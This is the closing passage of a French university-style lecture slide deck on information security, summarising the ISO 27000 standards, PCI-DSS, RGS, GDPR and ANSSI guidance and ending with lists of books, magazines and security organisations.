ISO 27004 : Indicateurs et tableaux de bord
ISO 27005 : La gestion du risque
ISO 27006 : Les audits de sécurité
ISO 27007 : Guide pour l’audit d’un SMSI

[email protected] Sécurité Informatique/ March 2, 2020 427 / 459


Les normes ISO 27000 sectorielles

ISO 27011 : Guide pour le secteur des télécommunications


ISO 27032 : Cybersécurité
ISO 27033 : Sécurité des réseaux informatiques
ISO 27034 : Sécurité applicative
ISO 27799 : Guide pour le secteur de la santé
Plus les autres (ISO 27012, ISO 27013, ...)

[email protected] Sécurité Informatique/ March 2, 2020 428 / 459


La norme ISO 27000

S’occupe des définitions et du vocabulaire


Publiée en 2009 et révisée en 2012
Ne donne pas lieu à une certification
Permet de parler de la même chose
Risque ?
Menace ?
Vulnérabilité ?

[email protected] Sécurité Informatique/ March 2, 2020 429 / 459


La norme ISO 27001

Mise en place d’un SMSI (Système de Management de la Sécurité


de l’Information)
Publiée en 2005, révisée en 2013
Donne lieu à une certification d’organisme
C’est quasiment une méta-norme qui référence les autres
La sécurité c’est "ni trop, ni trop peu"
Cette certification peut être "fumigène" : choix du périmètre
et des contraintes de sécurité
en aout 2007 : 5 certif françaises, 73 allemandes, 2280
japonaises

[email protected] Sécurité Informatique/ March 2, 2020 430 / 459


La norme ISO 27002

Ensemble de bonnes pratiques de la sécurité


Publiée
ex norme ISO 17799
133 mesures à prendre (mais pas toutes, car pas toujours
adaptées !)
11 chapitres
39 objectifs

[email protected] Sécurité Informatique/ March 2, 2020 431 / 459


La norme ISO 27003

Guide d’implémentation d’un SMSI


Publiée en 2010

[email protected] Sécurité Informatique/ March 2, 2020 432 / 459


La norme ISO 27004

Donne une liste d’indicateurs de sécurité à produire


A l’état de Draft
Ne donne pas lieu à une certification
20 indicateurs maximum
Indicateurs doivent être associés à des objectifs
Pas toujours "informatiques"

[email protected] Sécurité Informatique/ March 2, 2020 433 / 459


La norme ISO 27005

Tout ce qui tourne autour de la gestion du risque


informatique.
Ne donne pas les solutions pour diminuer le risque (les autres
normes s’en chargent)
Intégré dans la norme ISO31000 (gestion du risque global).
Donne lieu à une certification individuelle
En concurrence avec les méthodes Mehari, Ebios
Définition de mesures de risques
Définition de scénarii de menaces

[email protected] Sécurité Informatique/ March 2, 2020 434 / 459


La norme ISO 27006

Exigences que doivent remplir les organismes d’audit et de


certifications des SMSI.
Publiée et mise à jour en 2011
Donne lieu à une certification

[email protected] Sécurité Informatique/ March 2, 2020 435 / 459


La norme ISO 27007

Guide pour l’audit d’un SMSI


Draft
Recueil de bonnes pratiques

[email protected] Sécurité Informatique/ March 2, 2020 436 / 459


La norme ISO 27011

Guide pour le secteur des télécommunications


Publié en 2008

[email protected] Sécurité Informatique/ March 2, 2020 437 / 459


La norme ISO 27012

Guide pour le secteur des finances


Proposée (Stade avant le Draft) puis abandonnée.

[email protected] Sécurité Informatique/ March 2, 2020 438 / 459


La norme ISO 27013

Guide pour le secteur de l’industrie


publiée en 2012.

[email protected] Sécurité Informatique/ March 2, 2020 439 / 459


La norme ISO 27015

Directives pour l’accréditation


Publiée en 2012

[email protected] Sécurité Informatique/ March 2, 2020 440 / 459


La norme ISO 27016

Audits et revues
Publiée en 2014

[email protected] Sécurité Informatique/ March 2, 2020 441 / 459


La norme ISO 27031

Continuité d’activité
Publiée en 2011
Basée sur un British standard (BS 25999) et le (BC/DR
SS507) singapourien

[email protected] Sécurité Informatique/ March 2, 2020 442 / 459


La norme ISO 27032

Cybersécurité (Internet)
Publiée en 2012

[email protected] Sécurité Informatique/ March 2, 2020 443 / 459


La norme ISO 27033

Sécurité des réseaux informatiques


Publiée de 2009 à 2014 suivant les parties.
révision de l’ISO 18028
Découpé en 7 parties (27033-1, 27033-2, ...)

[email protected] Sécurité Informatique/ March 2, 2020 444 / 459


La norme ISO 27034

Sécurité Applicative
Publiée en 2011

[email protected] Sécurité Informatique/ March 2, 2020 445 / 459


La norme ISO 27799

Guide pour le secteur de la santé


Publiée en 2008
ISO 27002 spécifique au secteur de la santé

[email protected] Sécurité Informatique/ March 2, 2020 446 / 459


Comment cela s’applique ?

Le coeur est la norme ISO27001 et référence la plupart des autres.


C’est un modèle d’amélioration (PDCA)
On peut (doit) commencer petit
On peut (doit) accepter le droit à l’erreur
On fait une analyse de risques de haut niveau
On sélectionne les risques à traiter
On regarde les bonnes pratiques (27002) qui correspondent
On fait une analyse du risque pour le reste (27005)

[email protected] Sécurité Informatique/ March 2, 2020 447 / 459


Quelques liens

https://www.club-27001.fr/ Association pour la


promotion de l’ISO 27001
https://www.iso27001security.com

[email protected] Sécurité Informatique/ March 2, 2020 448 / 459


D’autres normes

D’autres normes, plus sectorielles existent pour améliorer la


sécurité
PCI-DSS et PA-DSS pour le secteur marchant utilisant les
cartes bancaires
RGS (1 et 2) pour l’état et ses administrations

[email protected] Sécurité Informatique/ March 2, 2020 449 / 459


PCI-DSS

Payment Card Industry


Norme bancaire réclamée à partir d’un certain C.A. associé à
Internet
Gratuite.
135 pages
12 conditions à respecter
La moitié en technique
La moitié en organisationnel
Actuellement en version 3.2
N’est pas une assurance de sécurité, mais de démarche
sécurité.
N’empêche absolument pas de se faire pirater du sol au
plafond.

[email protected] Sécurité Informatique/ March 2, 2020 450 / 459


RGS

Référentiel général de sécurité (RGS)


Version 2 publiée le 13 juin 2014, applicable depuis le 1er
juillet 2014
Concerne les téléservices de l’état.
Règles sur les applications web
Règles sur les certificats
Document
25 pages
5 annexes sur les certificats (de 14 à 89 pages)
3 annexes sur les mécanismes cryptographiques (de 29 à 63
pages)
1 annexe sur les prestataires d’audit

[email protected] Sécurité Informatique/ March 2, 2020 451 / 459


Guide d’hygiène informatique

Rédigée par l’ANSSI


40 règles
50 pages
Pas une norme, uniquement des bonnes pratiques
Inapplicable en totalité.
Mais quelques évidences... pas toujours appliquées.

[email protected] Sécurité Informatique/ March 2, 2020 452 / 459


PSSI Etat

Publiée le 17 juillet 2014


Version 1.0
42 pages très succintes
ne concerne que les SI "classiques"
doit être appliquée dans les 3 ans après la publication

[email protected] Sécurité Informatique/ March 2, 2020 453 / 459


La RGPD

Règlement Général de Protection des Données


ou GDPR (General Data Protection Regulation)
Applicable à partir du 25 mai 2018
Directive européenne (applicable directement)
Concerne la protection des données privées, pas la sécurité
mais cela l’implique
Créé un DPO (Data Protection Officer)
mais qui ne doit pas être le RSSI (Jugement Allemand)
Implique une analyse d’impact (PIA) à partir de certaines
données.

[email protected] Sécurité Informatique/ March 2, 2020 454 / 459


La RGPD
Les données à caractère personnel doivent être
« traitées de manière licite, loyale et transparente au regard de
la personne concernée ».
« collectées pour des finalités déterminées, explicites et
légitimes, et ne pas être traitées ultérieurement d’une manière
incompatible avec ces finalités ».
« adéquates, pertinentes et limitées à ce qui est nécessaire au
regard des finalités pour lesquelles elles sont traitées ».
« exactes et, si nécessaire, tenues à jour », sachant que toutes
les mesures raisonnables seront prises pour corriger les
inexactitudes.
« conservées sous une forme permettant l’identification des
personnes concernées pendant une durée n’excédant pas celle
nécessaire au regard des finalités pour lesquelles elles sont
traitées (sauf hypothèse d’archivage dans l’intérêt public, de
recherche scientifique, historique ou statistique).
« traitées de façon à garantir une sécurité appropriée »
[email protected] Sécurité Informatique/ March 2, 2020 455 / 459
Bibliographie

TCP/IP Règles et protocoles (Stevens)


Firewalls and Internet Security (Cheswick & Bellovin)
Building Internet Firewalls (Chapman & Zwicky)

[email protected] Sécurité Informatique/ March 2, 2020 456 / 459


Quelques revues

MISC (pluridisciplinaire, complexe, reconnue)


https://www.miscmag.com
Hackin9 (version française d’un magazine anglais)
https://hakin9.org/

[email protected] Sécurité Informatique/ March 2, 2020 457 / 459


Les organismes pour vous aider

De nombreux organismes ou associations fournissent d’excellents


supports pour améliorer sa sécurité
l’OSSIR https://www.ossir.org
le CLUSIF https://www.clusif.fr
les CLUSIRs : émanations régionales du CLUSIF
les CERTs dont le CERTA https://www.ssi.gouv.fr
le SANS https://www.sans.org
la NSA https://www.nsa.gov d’excellents documents
techniques de sécurisation
CAIDA https://www.caida.org
l’OWASP https://www.owasp.org
l’association Club 27001 https://www.club-27001.fr/

[email protected] Sécurité Informatique/ March 2, 2020 458 / 459


Urlographie : informations

Quelques sites web référents dans le domaine de la sécurité.


https://www.nolimitsecu.fr
https://zythom.blogspot.fr/
https://www.hsc.fr
https://www.zataz.com/
https://insecure.org

[email protected] Sécurité Informatique/ March 2, 2020 459 / 459

Vous aimerez peut-être aussi